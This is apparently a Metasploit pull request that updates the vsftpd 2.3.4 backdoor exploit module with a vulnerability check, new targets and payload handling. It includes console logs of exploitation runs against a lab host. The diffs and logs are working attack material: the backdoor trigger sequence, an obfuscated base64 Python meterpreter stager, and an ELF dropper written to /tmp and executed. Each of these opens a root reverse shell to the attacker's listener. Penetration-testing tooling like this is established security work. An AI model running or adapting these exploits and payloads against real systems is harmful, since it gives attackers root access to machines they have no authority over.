### PR TITLE
vsftpd_234_backdoor: Add check & targets

### DIFF
--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -96,11 +96,22 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    framework.sessions.each do |sid, sess|
+      next unless sess.via_exploit
+      if sess.via_exploit == fullname
+        vprint_error("Session #{sid} is already connected to the backdoor")
+      end
+    end
+
     nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
     if nsock
-      print_status("The port used by the backdoor bind listener is already open")
-      handle_backdoor(nsock)
-      return
+      print_warning("The port used by the backdoor bind listener is already open. Trying...")
+      begin
+        handle_backdoor(nsock)
+      rescue
+        vprint_error("Someone has beat us to it, the backdoor is already in-use!")
+        raise Msf::Exploit::Failed, "Backdoor already in-use"
+      end
     end
 
     # Connect to the FTP service port first
@@ -145,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if r !~ /uid=/
       print_error("The service on port 6200 does not appear to be a shell")
       disconnect(s)
-      return
+      raise Msf::Exploit::Failed, 'Could not connect to backdoor'
     end
 
     print_good("UID: #{r.strip}")

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -56,6 +56,45 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([ Opt::RPORT(21) ])
   end
 
+  def check
+    # Check for backdoor first, else exploit will fail
+    vprint_status("Checking if backdoor has already been triggered (else exploit will fail)")
+    nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
+    if nsock
+      print_error("The port used by the backdoor bind listener is already open/in-use (6200/TCP)")
+      return Exploit::CheckCode::Unknown
+    end
+
+    vprint_status("Connecting to FTP service")
+    connect
+
+    vprint_status("Checking FTP banner")
+    banner = sock.get_once(-1, 30).to_s
+
+    if banner.downcase.include?("vsftpd 2.3.4")
+      print_status("FTP banner hints its vulnerable: #{banner.strip}")
+    else
+      vprint_status("FTP banner: #{banner.strip}")
+    end
+
+    ftp_user = rand_text_alphanumeric(rand(6) + 1)
+    vprint_status("Trying to log into FTP (User: #{ftp_user})")
+    sock.put("USER #{ftp_user}\r\n")
+    resp = sock.get_once(-1, 30).to_s
+    if resp =~ /^530 /
+      print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
+      return Exploit::CheckCode::Safe
+    end
+
+    if resp !~ /^331 /
+      print_error("This server did not respond as expected: #{resp.strip}")
+      return Exploit::CheckCode::Unknown
+    end
+
+    return Exploit::CheckCode::Appears if banner.downcase.include?("vsftpd 2.3.4") and resp =~ /^331 /
+    return Exploit::CheckCode::Unknown
+  end
+
   def exploit
     nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
     if nsock

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'VSFTPD v2.3.4 Backdoor Command Execution',
         'Description' => %q{
-          This module exploits a malicious backdoor that was added to the	VSFTPD download
+          This module exploits a malicious backdoor that was added to the VSFTPD download
           archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
           June 30th 2011 and July 1st 2011 according to the most recent information
           available. This backdoor was removed on July 3rd 2011.
@@ -96,6 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    # Check for backdoor first, else exploit will fail
     framework.sessions.each do |sid, sess|
       next unless sess.via_exploit
       if sess.via_exploit == fullname
@@ -105,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
     if nsock
+      # Chance are, we will fail, but doesn't hurt to try
       print_warning("The port used by the backdoor bind listener is already open. Trying...")
       begin
         handle_backdoor(nsock)
@@ -114,10 +116,11 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    # Connect to the FTP service port first
+    # Now connect to the FTP service
     vprint_status("Connecting to FTP service")
     connect
 
+    # Without this, 220 response, rather than 331
     vprint_status("Checking FTP banner")
     banner = sock.get_once(-1, 30).to_s
     vprint_status("FTP banner: #{banner.strip}")
@@ -155,6 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_warning("Unable to connect to backdoor on 6200/TCP. Cooldown?")
     end
 
+    # Finished with FTP
     disconnect
   end
 
@@ -162,9 +166,11 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Trying 'id' command")
     s.put("id\n")
 
+    # Wait 5 seconds and get everything
     r = s.get_once(-1, 5).to_s
     if r !~ /uid=/
       print_error("The service on port 6200/TCP does not appear to be a fresh shell. Already exploited?")
+      # Finished with the backdoor
       disconnect(s)
       raise Msf::Exploit::Failed, 'Could not connect to backdoor'
     end

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -33,15 +33,24 @@ class MetasploitModule < Msf::Exploit::Remote
         'Payload' => {
           'Space' => 2000,
           'BadChars' => '',
-          'DisableNops' => true,
-          'Compat' =>
-                        {
-                          'PayloadType' => 'cmd_interact',
-                          'ConnectionType' => 'find'
-                        }
+          'DisableNops' => true
         },
         'Targets' => [
-          [ 'Automatic', {} ],
+          [
+            'Backdoor Shell',
+            {
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                    'PayloadType' => 'cmd_interact',
+                    'ConnectionType' => 'find',
+                }
+              }
+            }
+          ]
         ],
         'DisclosureDate' => '2011-07-03',
         'DefaultTarget' => 0,
@@ -177,7 +186,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_good("UID: #{r.strip}")
 
-    s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
+    unless payload.encoded.empty?
+      c = ""
+      c << payload.encoded
+      c << "\n"
+      vprint_status("Running: #{c.strip}")
+      s.put(c)
+    end
+
     handler(s)
   end
 end

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
         ],
         'Privileged' => true,
-        'Platform' => [ 'unix' ],
+        'Platform' => [ 'unix', 'linux' ],
         'Arch' => ARCH_CMD,
         'Payload' => {
           'Space' => 2000,
@@ -37,17 +37,12 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Targets' => [
           [
-            'Backdoor Shell',
+            'Linux/Unix Command',
             {
               'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/interact'
-              },
-              'Payload' => {
-                'Compat' => {
-                    'PayloadType' => 'cmd_interact',
-                    'ConnectionType' => 'find',
-                }
+                # This exploit also supports direct interaction with the backdoor using cmd/unix/interact payload
+                'PAYLOAD' => 'cmd/linux/http/x86/meterpreter_reverse_tcp'
               }
             }
           ]

--- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@@ -115,14 +115,18 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Connect to the FTP service port first
+    vprint_status("Connecting to FTP service")
     connect
 
+    vprint_status("Checking FTP banner")
     banner = sock.get_once(-1, 30).to_s
-    print_status("Banner: #{banner.strip}")
+    vprint_status("FTP banner: #{banner.strip}")
 
-    sock.put("USER #{rand_text_alphanumeric(rand(6) + 1)}:)\r\n")
+    ftp_user = "#{rand_text_alphanumeric(rand(6) + 1)}:)"
+    vprint_status("Trying to log into FTP via backdoor. User: #{ftp_user}")
+    sock.put("USER #{ftp_user}\r\n")
     resp = sock.get_once(-1, 30).to_s
-    print_status("USER: #{resp.strip}")
+    vprint_status(resp.strip)
 
     if resp =~ /^530 /
       print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
@@ -136,30 +140,36 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    sock.put("PASS #{rand_text_alphanumeric(rand(6) + 1)}\r\n")
+    ftp_pass = "#{rand_text_alphanumeric(rand(6) + 1)}"
+    vprint_status("Trying to log into FTP via backdoor. Password: #{ftp_pass}")
+    sock.put("PASS #{ftp_pass}\r\n")
 
     # Do not bother reading the response from password, just try the backdoor
+    vprint_status("Connecting to backdoor on 6200/TCP")
     nsock = self.connect(false, { 'RPORT' => 6200 }) rescue nil
     if nsock
-      print_good("Backdoor service has been spawned, handling...")
+      print_good("Backdoor has been spawned!")
       handle_backdoor(nsock)
       return
+    else
+      print_warning("Unable to connect to backdoor on 6200/TCP. Cooldown?")
     end
 
     disconnect
   end
 
   def handle_backdoor(s)
+    vprint_status("Trying 'id' command")
     s.put("id\n")
 
     r = s.get_once(-1, 5).to_s
     if r !~ /uid=/
-      print_error("The service on port 6200 does not appear to be a shell")
+      print_error("The service on port 6200/TCP does not appear to be a fresh shell. Already exploited?")
       disconnect(s)
       raise Msf::Exploit::Failed, 'Could not connect to backdoor'
     end
 
-    print_good("UID: #{r.strip}")
+    vprint_good("UID: #{r.strip}")
 
     s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
     handler(s)


### PR DESCRIPTION
This has various improvements to `exploit/unix/ftp/vsftpd_234_backdoor`, such as:

- Add checks
- Improved logic
- Be more verbose with output
- Add more targets (CMD & Dropper)

- - -

## After

```console
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use exploit/unix/ftp/vsftpd_234_backdoor; options; show targets'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] Using configured payload cmd/unix/interact

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    21               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Exploit target:

   Id  Name
   --  ----
   0   Directly Interact With The Backdoor Shell



View the full module info with the info, or info -d command.


Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Directly Interact With The Backdoor Shell
    1   Run Unix Commands via Post Exploitation
    2   Linux Dropper via Post Exploitation


msf exploit(unix/ftp/vsftpd_234_backdoor) >
```

**Check**:

```console
msf exploit(unix/ftp/vsftpd_234_backdoor) > check
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP Banner hints its vulnerable: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP (User: Bu)
[*] 10.0.0.10:21 - The target appears to be vulnerable.
msf exploit(unix/ftp/vsftpd_234_backdoor) >
```

**Target 0** _(Default)_:

```console
msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.0.0.10:21 - Executing Directly Interact With The Backdoor Shell for cmd/unix/interact
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: G:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: h
[*] 10.0.0.10:21 - Connecting to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.0.0.1:42265 -> 10.0.0.10:6200) at 2026-02-10 17:32:29 +0000

id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.10 - Command shell session 1 closed.  Reason: User exit
msf exploit(unix/ftp/vsftpd_234_backdoor) >
```

**Target 1**:

```console
msf exploit(unix/ftp/vsftpd_234_backdoor) > set target 1
target => 1
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21 - Executing Run Unix Commands via Post Exploitation for cmd/unix/python/meterpreter/reverse_tcp
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: x6:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: 29StE
[*] 10.0.0.10:21 - Connecting to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] 10.0.0.10:21 - Running: echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9T1FLxDAMfl5/xd7aYi2bzHs4nCDig4gInm8isrVRy7q2ND2div/dlR6XQEK+JF/ymTn4mGr0aoIkfqwZxTggbDqBKe5VEsnMQN58rJfauDoO7h1Y2/AtqVL8XmOFfVmWJbEzcah3D9d3r7unx5ure57npPLOgUqM0baR2VsqutV4bo8RholUsCgIKfPmwxItQGDnnNi+/CP3LgxqYvTylgqUEdQnWwmemxei+0NtOfn6MBZqC45pfmFXOn1y7J4WmBNYQLEsWWpQfg4REFlRL8dNl0ENeVL8UqRb/OPkH5XgXiA\=\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
[*] Sending stage (23400 bytes) to 10.0.0.10
[*] Meterpreter session 2 opened (10.0.0.1:4444 -> 10.0.0.10:45674) at 2026-02-10 17:32:40 +0000

meterpreter > shell
Process 4953 created.
Channel 1 created.
id
uid=0(root) gid=0(root)
exit
meterpreter > exit
[*] Shutting down session: 2

[*] 10.0.0.10 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(unix/ftp/vsftpd_234_backdoor) >
```

**Target 2**:

```console
msf exploit(unix/ftp/vsftpd_234_backdoor) > set target 2
target => 2
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21 - Executing Linux Dropper via Post Exploitation for linux/x86/meterpreter/reverse_tcp
[*] 10.0.0.10:21 - Generated command stager: ["echo -en \\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x01\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x03\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x54\\\\x80\\\\x04\\\\x08\\\\x34\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x34\\\\x00\\\\x20\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x04\\\\x08\\\\x00\\\\x80\\\\x04\\\\x08\\\\xcf\\\\x00\\\\x00\\\\x00\\\\x4a\\\\x01\\\\x00\\\\x00\\\\x07\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x6a\\\\x0a\\\\x5e\\\\x31\\\\xdb\\\\xf7\\\\xe3\\\\x53\\\\x43\\\\x53\\\\x6a\\\\x02\\\\xb0\\\\x66\\\\x89\\\\xe1\\\\xcd\\\\x80\\\\x97\\\\x5b\\\\x68\\\\x0a\\\\x00\\\\x00\\\\x01\\\\x68\\\\x02\\\\x00\\\\x11\\\\x5c\\\\x89\\\\xe1\\\\x6a\\\\x66\\\\x58\\\\x50\\\\x51\\\\x57\\\\x89\\\\xe1\\\\x43\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x79\\\\x19\\\\x4e\\\\x74\\\\x3d\\\\x68\\\\xa2\\\\x00\\\\x00\\\\x00\\\\x58\\\\x6a\\\\x00\\\\x6a\\\\x05\\\\x89\\\\xe3\\\\x31\\\\xc9\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x79\\\\xbd\\\\xeb\\\\x27\\\\xb2\\\\x07\\\\xb9\\\\x00\\\\x10\\\\x00\\\\x00\\\\x89\\\\xe3\\\\xc1\\\\xeb\\\\x0c\\\\xc1\\\\xe3\\\\x0c\\\\xb0\\\\x7d\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x78\\\\x10\\\\x5b\\\\x89\\\\xe1\\\\x99\\\\xb2\\\\x66\\\\xb0\\\\x03\\\\xcd\\\\x80\\\\x85\\\\xc0\\\\x78\\\\x02\\\\xff\\\\xe1\\\\xb8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xbb\\\\x01\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80>>/tmp/nrKde ; chmod 777 /tmp/nrKde ; /tmp/nrKde ; rm -f /tmp/nrKde"]
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: 8:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: 2P0DkB
[*] 10.0.0.10:21 - Connecting to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] 10.0.0.10:21 - Running: echo -en \\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00\\x00\\x54\\x80\\x04\\x08\\x34\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x04\\x08\\x00\\x80\\x04\\x08\\xcf\\x00\\x00\\x00\\x4a\\x01\\x00\\x00\\x07\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x6a\\x0a\\x5e\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x97\\x5b\\x68\\x0a\\x00\\x00\\x01\\x68\\x02\\x00\\x11\\x5c\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x57\\x89\\xe1\\x43\\xcd\\x80\\x85\\xc0\\x79\\x19\\x4e\\x74\\x3d\\x68\\xa2\\x00\\x00\\x00\\x58\\x6a\\x00\\x6a\\x05\\x89\\xe3\\x31\\xc9\\xcd\\x80\\x85\\xc0\\x79\\xbd\\xeb\\x27\\xb2\\x07\\xb9\\x00\\x10\\x00\\x00\\x89\\xe3\\xc1\\xeb\\x0c\\xc1\\xe3\\x0c\\xb0\\x7d\\xcd\\x80\\x85\\xc0\\x78\\x10\\x5b\\x89\\xe1\\x99\\xb2\\x66\\xb0\\x03\\xcd\\x80\\x85\\xc0\\x78\\x02\\xff\\xe1\\xb8\\x01\\x00\\x00\\x00\\xbb\\x01\\x00\\x00\\x00\\xcd\\x80>>/tmp/nrKde ; chmod 777 /tmp/nrKde ; /tmp/nrKde ; rm -f /tmp/nrKde
[*] Transmitting intermediate stager...(102 bytes)
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] 10.0.0.10:21 - Command Stager progress - 100.00% done (1111/1111 bytes)
[*] Meterpreter session 3 opened (10.0.0.1:4444 -> 10.0.0.10:45675) at 2026-02-10 17:32:58 +0000

meterpreter > shell
Process 4963 created.
Channel 1 created.
id
uid=0(root) gid=0(root)
```